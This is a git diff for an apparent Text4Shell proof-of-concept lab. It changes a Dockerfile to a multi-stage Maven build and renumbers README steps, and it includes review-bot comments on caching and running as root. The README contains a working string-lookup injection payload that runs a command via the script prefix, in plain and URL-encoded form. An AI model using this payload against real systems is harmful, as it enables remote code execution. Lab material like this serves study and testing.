diff --git a/Dockerfile b/Dockerfile index a31999b..7ed5626 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,3 +1,9 @@ +# Build the jar File +FROM maven:3.8.6-eclipse-temurin-8-alpine as build +WORKDIR /app +COPY . /app +RUN mvn clean install + # Use an official OpenJDK runtime as a parent image FROM openjdk:8-jre-alpine @@ -9,10 +15,10 @@ RUN apk update && apk add bash WORKDIR /app # Copy the fat jar into the container at /app -COPY /target/text4shell-poc.jar /app +COPY --from=build /app/target/text4shell-poc.jar /app # Make port 8080 available to the world outside this container EXPOSE 8080 # Run jar file when the container launches -CMD ["java", "-jar", "text4shell-poc.jar"] \ No newline at end of file +CMD ["java", "-jar", "text4shell-poc.jar"] diff --git a/README.md b/README.md index 2452d91..7e43d0f 100644 --- a/README.md +++ b/README.md @@ -1,32 +1,26 @@ ### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) -------------- +--- -1. Maven install to create the fat jar - -``` -mvn clean install -``` - -2. Docker build +1. Docker build ``` docker build --tag=text4shell . ``` -3. Docker run +2. Docker run ``` docker run -p 80:8080 text4shell ``` -4. Test the app +3. Test the app ``` http://localhost/text4shell/attack?search= ``` -5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: +4. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: ``` ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} 
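Review bot: `COPY . /app` in the new build stage pulls the whole build context into the layer, and the part of the commit shown here adds no `.dockerignore`, so a host-side `target/`, `.git` and any stray local files are sent along and every source edit invalidates the Maven dependency download. Copying the manifest first keeps that layer cached: `COPY pom.xml /app/`, `RUN mvn -B dependency:go-offline`, then `COPY src /app/src` (this assumes the standard Maven layout, which is not visible here). `mvn -B clean package` is enough to produce the jar under `target/`; `install` also writes into the local repository of a stage that is discarded. For consistent instruction casing the stage keyword would read `AS build`.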
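Review bot: The runtime stage shows no `USER` instruction around the new `COPY --from=build` line, so the jar started by `CMD` runs as root unless the lines between the two hunks (not shown) set one. Since the README for this image demonstrates command execution inside the container, a dedicated account limits what an injected command can touch: `RUN addgroup -S app && adduser -S -G app app` after the `apk` step and `USER app` before `CMD`. The `/tmp/foo` check from the README should still pass for an unprivileged user, because `/tmp` is world-writable by default. Both base tags (`maven:3.8.6-eclipse-temurin-8-alpine` and `openjdk:8-jre-alpine`) are mutable, so pinning each as `tag@sha256:<digest>` would keep the lab image reproducible.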
@@ -34,28 +28,28 @@ ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D -6. You can also try using `dns` or `url` prefixes. +5. You can also try using `dns` or `url` prefixes. -7. Get the container id +6. Get the container id ``` docker container ls ``` -8. Get into the app +7. Get into the app ``` docker exec -it bash ``` -9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): +8. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): ``` ls /tmp/ ``` -10. To stop the container +9. To stop the container ``` docker container stop -``` \ No newline at end of file +```